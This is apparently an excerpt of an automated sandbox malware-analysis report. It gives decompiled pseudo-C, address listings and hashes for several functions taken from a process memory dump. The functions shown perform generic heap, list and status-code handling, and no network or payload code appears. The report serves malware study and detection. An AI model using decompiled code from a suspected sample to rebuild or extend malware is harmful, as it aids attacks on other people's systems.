				_t78 = L00AA4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t78 == 0) {
					goto L18;
				} else {
					_t12 = _t87 + 2; // 0x2
					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
					_t16 = _t78 + 0x18; // 0x18
					E00ACF3E0(_t16, _v8[2], _t87);
					 *((short*)(_t78 + _t87 + 0x18)) = 0;
					_t19 = _t78 + 0xc; // 0xc
					_t66 = _t19;
					 *((intOrPtr*)(_t66 + 4)) = _t66;
					 *_t66 = _t66;
					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
					_t81 = L00AA4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t81 == 0) {
						goto L18;
					} else {
						_t26 = _t78 + 0xc; // 0xc
						_t69 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t85 =  *_t69;
						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t81 + 4)) = _t69;
							 *_t81 = _t85;
							 *((intOrPtr*)(_t85 + 4)) = _t81;
							 *_t69 = _t81;
							_t83 = _v12;
							 *(_t78 + 8) = 1;
							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							_t34 = _t83 + 0x154; // 0x1ba
							_t69 = _t34;
							_t85 =  *_t69;
							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
								goto L20;
							} else {
								 *_t78 = _t85;
								 *((intOrPtr*)(_t78 + 4)) = _t69;
								 *((intOrPtr*)(_t85 + 4)) = _t78;
								 *_t69 = _t78;
								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							}
						}
						goto L11;
					}
				}
				goto L12;
			}





















                                                    0x00b5740d
                                                    0x00b5740d
                                                    0x00b57412
                                                    0x00b57413
                                                    0x00b57416
                                                    0x00b57418
                                                    0x00b5741c
                                                    0x00b5741f
                                                    0x00b57422
                                                    0x00b57422
                                                    0x00b57428
                                                    0x00b5742a
                                                    0x00b5742a
                                                    0x00b57451
                                                    0x00b57432
                                                    0x00b5744f
                                                    0x00b5744f
                                                    0x00000000
                                                    0x00b57434
                                                    0x00b57438
                                                    0x00b57443
                                                    0x00b57517
                                                    0x00b57517
                                                    0x00b5751a
                                                    0x00b57535
                                                    0x00b57520
                                                    0x00b57527
                                                    0x00b5752c
                                                    0x00b57531
                                                    0x00b57533
                                                    0x00000000
                                                    0x00b57533
                                                    0x00000000
                                                    0x00b57531
                                                    0x00b5754b
                                                    0x00b5754f
                                                    0x00b5755c
                                                    0x00b5755c
                                                    0x00b5755f
                                                    0x00b57560
                                                    0x00b57561
                                                    0x00b57562
                                                    0x00b57563
                                                    0x00b57568
                                                    0x00b5756a
                                                    0x00b5756c
                                                    0x00b5756d
                                                    0x00b5756d
                                                    0x00b5756f
                                                    0x00b57572
                                                    0x00b57574
                                                    0x00b57577
                                                    0x00b5757c
                                                    0x00b5757f
                                                    0x00000000
                                                    0x00b57551
                                                    0x00b57551
                                                    0x00b57551
                                                    0x00b57553
                                                    0x00b57553
                                                    0x00b57449
                                                    0x00b57449
                                                    0x00b5744c
                                                    0x00b5744c
                                                    0x00000000
                                                    0x00b5744c
                                                    0x00b57443
                                                    0x00b5750e
                                                    0x00b57514
                                                    0x00b57514
                                                    0x00b57455
                                                    0x00b57469
                                                    0x00b5746d
                                                    0x00000000
                                                    0x00b57473
                                                    0x00b57473
                                                    0x00b57476
                                                    0x00b57480
                                                    0x00b57484
                                                    0x00b5748e
                                                    0x00b57493
                                                    0x00b57493
                                                    0x00b57496
                                                    0x00b57499
                                                    0x00b574a1
                                                    0x00b574b1
                                                    0x00b574b5
                                                    0x00000000
                                                    0x00b574bb
                                                    0x00b574c1
                                                    0x00b574c1
                                                    0x00b574c4
                                                    0x00b574c5
                                                    0x00b574c6
                                                    0x00b574c7
                                                    0x00b574c8
                                                    0x00b574cd
                                                    0x00000000
                                                    0x00b574d3
                                                    0x00b574d3
                                                    0x00b574d6
                                                    0x00b574d8
                                                    0x00b574db
                                                    0x00b574dd
                                                    0x00b574e0
                                                    0x00b574e7
                                                    0x00b574ee
                                                    0x00b574ee
                                                    0x00b574f4
                                                    0x00b574f9
                                                    0x00000000
                                                    0x00b574fb
                                                    0x00b574fb
                                                    0x00b574fd
                                                    0x00b57500
                                                    0x00b57503
                                                    0x00b57505
                                                    0x00b57505
                                                    0x00b574f9
                                                    0x00000000
                                                    0x00b574cd
                                                    0x00b574b5
                                                    0x00000000

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                    • Instruction ID: e7f46671a3f3c8b7d2cf1c570e518dd85e9892ffcb666ce0c4e43a3fb580d8e9
                                                    • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                    • Instruction Fuzzy Hash: 87519871640606EFCB16CF14E980B96BBF5FF55305F1480EAE8089F212E771E94ACBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00AB2990 Relevance: .1, Instructions: 133COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 97%
                                                    			E00AB2990() {
				signed int* _t62;
				signed int _t64;
				intOrPtr _t66;
				signed short* _t69;
				intOrPtr _t76;
				signed short* _t79;
				void* _t81;
				signed int _t82;
				signed short* _t83;
				signed int _t87;
				intOrPtr _t91;
				void* _t98;
				signed int _t99;
				void* _t101;
				signed int* _t102;
				void* _t103;
				void* _t104;
				void* _t107;

				_push(0x20);
				_push(0xb5ff00);
				E00ADD08C(_t81, _t98, _t101);
				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
				_t99 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
				_t82 =  *((intOrPtr*)(_t103 + 0x10));
				if(_t82 == 0) {
					_t62 = 0xc0000100;
				} else {
					 *((intOrPtr*)(_t103 - 4)) = 0;
					_t102 = 0xc0000100;
					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
					_t64 = 4;
					while(1) {
						 *(_t103 - 0x24) = _t64;
						if(_t64 == 0) {
							break;
						}
						_t87 = _t64 * 0xc;
						 *(_t103 - 0x2c) = _t87;
						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0xa61664));
						if(_t107 <= 0) {
							if(_t107 == 0) {
								_t79 = E00ACE5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0xa61668)), _t82);
								_t104 = _t104 + 0xc;
								__eflags = _t79;
								if(__eflags == 0) {
									_t102 = E00B051BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0xa6166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
									break;
								} else {
									_t64 =  *(_t103 - 0x24);
									goto L5;
								}
								goto L13;
							} else {
								L5:
								_t64 = _t64 - 1;
								continue;
							}
						}
						break;
					}
					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
					__eflags = _t102;
					if(_t102 < 0) {
						__eflags = _t102 - 0xc0000100;
						if(_t102 == 0xc0000100) {
							_t83 =  *((intOrPtr*)(_t103 + 8));
							__eflags = _t83;
							if(_t83 != 0) {
								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
								__eflags =  *_t83 - _t99;
								if( *_t83 == _t99) {
									_t102 = 0xc0000100;
									goto L19;
								} else {
									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
									_t66 =  *((intOrPtr*)(_t91 + 0x10));
									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
											L26:
											_t102 = E00AB2AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
											__eflags = _t102 - 0xc0000100;
											if(_t102 != 0xc0000100) {
												goto L12;
											} else {
												_t99 = 1;
												_t83 =  *((intOrPtr*)(_t103 - 0x20));
												goto L18;
											}
										} else {
											_t69 = E00A96600( *((intOrPtr*)(_t91 + 0x1c)));
											__eflags = _t69;
											if(_t69 != 0) {
												goto L26;
											} else {
												_t83 =  *((intOrPtr*)(_t103 + 8));
												goto L18;
											}
										}
									} else {
										L18:
										_t102 = E00AB2C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
										L19:
										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
										goto L12;
									}
								}
								L28:
							} else {
								E00A9EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
								 *((intOrPtr*)(_t103 - 4)) = 1;
								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
								_t76 = E00AB2AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
								__eflags = _t76 - 0xc0000100;
								if(_t76 == 0xc0000100) {
									 *((intOrPtr*)(_t103 - 0x1c)) = E00AB2C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
								}
								 *((intOrPtr*)(_t103 - 4)) = _t99;
								E00AB2ACB();
							}
						}
					}
					L12:
					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
					_t62 = _t102;
				}
				L13:
				return E00ADD0D1(_t62);
				goto L28;
			}





















                                                    0x00ab2990
                                                    0x00ab2992
                                                    0x00ab2997
                                                    0x00ab29a3
                                                    0x00ab29a6
                                                    0x00ab29ab
                                                    0x00ab29ad
                                                    0x00ab29b2
                                                    0x00af5c80
                                                    0x00ab29b8
                                                    0x00ab29b8
                                                    0x00ab29bb
                                                    0x00ab29c0
                                                    0x00ab29c5
                                                    0x00ab29c6
                                                    0x00ab29c6
                                                    0x00ab29cb
                                                    0x00000000
                                                    0x00000000
                                                    0x00ab29cd
                                                    0x00ab29d0
                                                    0x00ab29d9
                                                    0x00ab29db
                                                    0x00ab29dd
                                                    0x00ab2a7f
                                                    0x00ab2a84
                                                    0x00ab2a87
                                                    0x00ab2a89
                                                    0x00af5ca1
                                                    0x00af5ca3
                                                    0x00000000
                                                    0x00ab2a8f
                                                    0x00ab2a8f
                                                    0x00000000
                                                    0x00ab2a8f
                                                    0x00000000
                                                    0x00ab29e3
                                                    0x00ab29e3
                                                    0x00ab29e3
                                                    0x00000000
                                                    0x00ab29e3
                                                    0x00ab29dd
                                                    0x00000000
                                                    0x00ab29db
                                                    0x00ab29e6
                                                    0x00ab29e9
                                                    0x00ab29eb
                                                    0x00ab29ed
                                                    0x00ab29f3
                                                    0x00ab29f5
                                                    0x00ab29f8
                                                    0x00ab29fa
                                                    0x00ab2a97
                                                    0x00ab2a9a
                                                    0x00ab2a9d
                                                    0x00ab2add
                                                    0x00000000
                                                    0x00ab2a9f
                                                    0x00ab2aa2
                                                    0x00ab2aa5
                                                    0x00ab2aa8
                                                    0x00ab2aab
                                                    0x00af5cab
                                                    0x00af5caf
                                                    0x00af5cc5
                                                    0x00af5cda
                                                    0x00af5cdc
                                                    0x00af5cdf
                                                    0x00af5ce5
                                                    0x00000000
                                                    0x00af5ceb
                                                    0x00af5ced
                                                    0x00af5cee
                                                    0x00000000
                                                    0x00af5cee
                                                    0x00af5cb1
                                                    0x00af5cb4
                                                    0x00af5cb9
                                                    0x00af5cbb
                                                    0x00000000
                                                    0x00af5cbd
                                                    0x00af5cbd
                                                    0x00000000
                                                    0x00af5cbd
                                                    0x00af5cbb
                                                    0x00ab2ab1
                                                    0x00ab2ab1
                                                    0x00ab2ac4
                                                    0x00ab2ac6
                                                    0x00ab2ac6
                                                    0x00000000
                                                    0x00ab2ac6
                                                    0x00ab2aab
                                                    0x00000000
                                                    0x00ab2a00
                                                    0x00ab2a09
                                                    0x00ab2a0e
                                                    0x00ab2a21
                                                    0x00ab2a24
                                                    0x00ab2a35
                                                    0x00ab2a3a
                                                    0x00ab2a3d
                                                    0x00ab2a42
                                                    0x00ab2a59
                                                    0x00ab2a59
                                                    0x00ab2a5c
                                                    0x00ab2a5f
                                                    0x00ab2a5f
                                                    0x00ab29fa
                                                    0x00ab29f3
                                                    0x00ab2a64
                                                    0x00ab2a64
                                                    0x00ab2a6b
                                                    0x00ab2a6b
                                                    0x00ab2a6d
                                                    0x00ab2a72
                                                    0x00000000

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a190ad428115cf3a5bb50e7c6e0ae6e8c775f0da084ac186e8bcfe74d3848750
                                                    • Instruction ID: 981733432dc6703b268772a3597f17f722f4adadb6cfbc7cd6897d0390c5bd8b
                                                    • Opcode Fuzzy Hash: a190ad428115cf3a5bb50e7c6e0ae6e8c775f0da084ac186e8bcfe74d3848750
                                                    • Instruction Fuzzy Hash: BF517971A00209DFDF25DF95C980AEEBBB9BF48350F14805AF915AB262C3359D52DF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00AB4D3B Relevance: .1, Instructions: 131COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 78%
                                                    			E00AB4D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0xb7d360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E00ACFA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0xb77bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E00ACB0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L00AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L00AA4620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E00A8CCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L00AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return E00ACB640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E00ACF380(_t67 + 0xc, 0xa65138, 0x10) == 0) {
								 *0xb760d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E00AB4F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(E00AB4E70(0xb786b0, 0xab5690, 0, 0) != 0) {
					_t46 = E00A8CCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}




















                                                    0x00ab4d3b
                                                    0x00ab4d4d
                                                    0x00ab4d53
                                                    0x00ab4d58
                                                    0x00ab4d65
                                                    0x00ab4d6c
                                                    0x00ab4d71
                                                    0x00ab4d77
                                                    0x00ab4d7f
                                                    0x00ab4d8c
                                                    0x00ab4d8e
                                                    0x00ab4dad
                                                    0x00ab4db0
                                                    0x00ab4db7
                                                    0x00ab4db8
                                                    0x00ab4db9
                                                    0x00ab4dba
                                                    0x00ab4dbb
                                                    0x00ab4dc1
                                                    0x00ab4dc8
                                                    0x00ab4dcc
                                                    0x00ab4dd5
                                                    0x00ab4dde
                                                    0x00ab4ddf
                                                    0x00ab4de0
                                                    0x00ab4de1
                                                    0x00ab4de6
                                                    0x00ab4de7
                                                    0x00ab4de9
                                                    0x00ab4df3
                                                    0x00000000
                                                    0x00000000
                                                    0x00af6c7c
                                                    0x00af6c8a
                                                    0x00af6c8a
                                                    0x00af6c9d
                                                    0x00af6ca7
                                                    0x00af6cac
                                                    0x00af6cb2
                                                    0x00af6cb9
                                                    0x00000000
                                                    0x00af6cbf
                                                    0x00af6cbf
                                                    0x00000000
                                                    0x00af6cbf
                                                    0x00af6cb9
                                                    0x00ab4dfb
                                                    0x00af6ccf
                                                    0x00af6cd3
                                                    0x00ab4e32
                                                    0x00ab4e39
                                                    0x00af6ce0
                                                    0x00af6cf2
                                                    0x00af6cf2
                                                    0x00af6ce0
                                                    0x00ab4e3f
                                                    0x00ab4e41
                                                    0x00ab4e51
                                                    0x00ab4e51
                                                    0x00ab4e03
                                                    0x00ab4e03
                                                    0x00ab4e09
                                                    0x00ab4e0f
                                                    0x00ab4e57
                                                    0x00000000
                                                    0x00000000
                                                    0x00ab4e1b
                                                    0x00ab4e30
                                                    0x00ab4e5b
                                                    0x00ab4e5b
                                                    0x00000000
                                                    0x00ab4e30
                                                    0x00ab4e11
                                                    0x00ab4e11
                                                    0x00ab4e16
                                                    0x00000000
                                                    0x00ab4e16
                                                    0x00ab4e01
                                                    0x00000000
                                                    0x00ab4e01
                                                    0x00ab4da5
                                                    0x00af6c6b
                                                    0x00000000
                                                    0x00ab4dab
                                                    0x00ab4dab
                                                    0x00000000
                                                    0x00ab4dab

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 297f3710e0b160b6f66385faac8e408503cf5c7c8b86eb873128a545d32139ae
                                                    • Instruction ID: f00af119af5d74e543fce387c106dba9fc206916a968f622e7f94bed54189c34
                                                    • Opcode Fuzzy Hash: 297f3710e0b160b6f66385faac8e408503cf5c7c8b86eb873128a545d32139ae
                                                    • Instruction Fuzzy Hash: F5417071A40318AEEB219F24CD81FEAB7B9FB49710F1440A9F9499B283DB74DD44CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00AB4BAD Relevance: .1, Instructions: 131COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 85%
                                                    			E00AB4BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
				signed int _v8;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v156;
				short _v158;
				intOrPtr _v160;
				char _v164;
				intOrPtr _v168;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				intOrPtr _t74;
				signed char _t77;
				intOrPtr _t84;
				char* _t85;
				void* _t86;
				intOrPtr _t87;
				signed short _t88;
				signed int _t89;

				_t83 = __edx;
				_v8 =  *0xb7d360 ^ _t89;
				_t45 = _a8 & 0x0000ffff;
				_v158 = __edx;
				_v168 = __ecx;
				if(_t45 == 0) {
					L22:
					_t86 = 6;
					L12:
					E00A8CC50(_t86);
					L11:
					return E00ACB640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
				}
				_t77 = _a4;
				if((_t77 & 0x00000001) != 0) {
					goto L22;
				}
				_t8 = _t77 + 0x34; // 0xdce0ba00
				if(_t45 !=  *_t8) {
					goto L22;
				}
				_t9 = _t77 + 0x24; // 0xb78504
				E00AA2280(_t9, _t9);
				_t87 = 0x78;
				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
				E00ACFA60( &_v156, 0, _t87);
				_t13 = _t77 + 0x30; // 0x3db8
				_t85 =  &_v156;
				_v36 =  *_t13;
				_v28 = _v168;
				_v32 = 0;
				_v24 = 0;
				_v20 = _v158;
				_v160 = 0;
				while(1) {
					_push( &_v164);
					_push(_t87);
					_push(_t85);
					_push(0x18);
					_push( &_v36);
					_push(0x1e);
					_t88 = E00ACB0B0();
					if(_t88 != 0xc0000023) {
						break;
					}
					if(_t85 !=  &_v156) {
						L00AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
					}
					_t84 = L00AA4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
					_v168 = _v164;
					if(_t84 == 0) {
						_t88 = 0xc0000017;
						goto L19;
					} else {
						_t74 = _v160 + 1;
						_v160 = _t74;
						if(_t74 >= 0x10) {
							L19:
							_t86 = E00A8CCC0(_t88);
							if(_t86 != 0) {
								L8:
								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
								_t30 = _t77 + 0x24; // 0xb78504
								E00A9FFB0(_t77, _t84, _t30);
								if(_t84 != 0 && _t84 !=  &_v156) {
									L00AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
								}
								if(_t86 != 0) {
									goto L12;
								} else {
									goto L11;
								}
							}
							L6:
							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
							if(_v164 != 0) {
								_t83 = _t84;
								E00AB4F49(_t77, _t84);
							}
							goto L8;
						}
						_t87 = _v168;
						continue;
					}
				}
				if(_t88 != 0) {
					goto L19;
				}
				goto L6;
			}


























                                                    0x00ab4bad
                                                    0x00ab4bbf
                                                    0x00ab4bc2
                                                    0x00ab4bc6
                                                    0x00ab4bcd
                                                    0x00ab4bd9
                                                    0x00af67fe
                                                    0x00af6800
                                                    0x00ab4ccc
                                                    0x00ab4ccd
                                                    0x00ab4cb7
                                                    0x00ab4cc9
                                                    0x00ab4cc9
                                                    0x00ab4bdf
                                                    0x00ab4be5
                                                    0x00000000
                                                    0x00000000
                                                    0x00ab4beb
                                                    0x00ab4bef
                                                    0x00000000
                                                    0x00000000
                                                    0x00ab4bf5
                                                    0x00ab4bf9
                                                    0x00ab4c06
                                                    0x00ab4c0b
                                                    0x00ab4c17
                                                    0x00ab4c1c
                                                    0x00ab4c1f
                                                    0x00ab4c25
                                                    0x00ab4c33
                                                    0x00ab4c3d
                                                    0x00ab4c40
                                                    0x00ab4c43
                                                    0x00ab4c47
                                                    0x00ab4c4d
                                                    0x00ab4c53
                                                    0x00ab4c54
                                                    0x00ab4c55
                                                    0x00ab4c56
                                                    0x00ab4c5b
                                                    0x00ab4c5c
                                                    0x00ab4c63
                                                    0x00ab4c6b
                                                    0x00000000
                                                    0x00000000
                                                    0x00af6776
                                                    0x00af6784
                                                    0x00af6784
                                                    0x00af679f
                                                    0x00af67a7
                                                    0x00af67af
                                                    0x00af67ce
                                                    0x00000000
                                                    0x00af67b1
                                                    0x00af67b7
                                                    0x00af67b8
                                                    0x00af67c1
                                                    0x00af67d3
                                                    0x00af67d9
                                                    0x00af67dd
                                                    0x00ab4c94
                                                    0x00ab4c94
                                                    0x00ab4c98
                                                    0x00ab4c9c
                                                    0x00ab4ca3
                                                    0x00af67f4
                                                    0x00af67f4
                                                    0x00ab4cb5
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00ab4cb5
                                                    0x00ab4c79
                                                    0x00ab4c7e
                                                    0x00ab4c89
                                                    0x00ab4c8b
                                                    0x00ab4c8f
                                                    0x00ab4c8f
                                                    0x00000000
                                                    0x00ab4c89
                                                    0x00af67c3
                                                    0x00000000
                                                    0x00af67c3
                                                    0x00af67af
                                                    0x00ab4c73
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0c82b8a7aad7d453c99e482af6e9ffbf8ea3885cb1a9ffb4a10477221bcec777
                                                    • Instruction ID: 5bffc42f170d68ad383ef07eeb4fa754f82c8345d061782b8d66124b43c472a6
                                                    • Opcode Fuzzy Hash: 0c82b8a7aad7d453c99e482af6e9ffbf8ea3885cb1a9ffb4a10477221bcec777
                                                    • Instruction Fuzzy Hash: F5417575A0122C9BCB21EF64C941FEAB7B8EF49750F0100A5F908AB242DB749E84CB95
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00A98A0A Relevance: .1, Instructions: 120COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 94%
                                                    			E00A98A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
				_v8 =  *0xb7d360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return E00ACB640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					E00A9E9C0(1, __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_t46 = 0xa;
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0xa61180;
						L5:
						_t79 = 1;
						goto L6;
					} else {
						_t48 = E00AB1DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							E00AC3C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(E00A98999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
								L00AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}



























                                                    0x00a98a0a
                                                    0x00a98a1c
                                                    0x00a98a23
                                                    0x00a98a2e
                                                    0x00a98a30
                                                    0x00a98a36
                                                    0x00a98a3c
                                                    0x00a98a3e
                                                    0x00a98a4a
                                                    0x00a98a52
                                                    0x00a98a9c
                                                    0x00a98aae
                                                    0x00a98a58
                                                    0x00a98a5e
                                                    0x00a98a6a
                                                    0x00a98a6f
                                                    0x00a98a75
                                                    0x00a98a7d
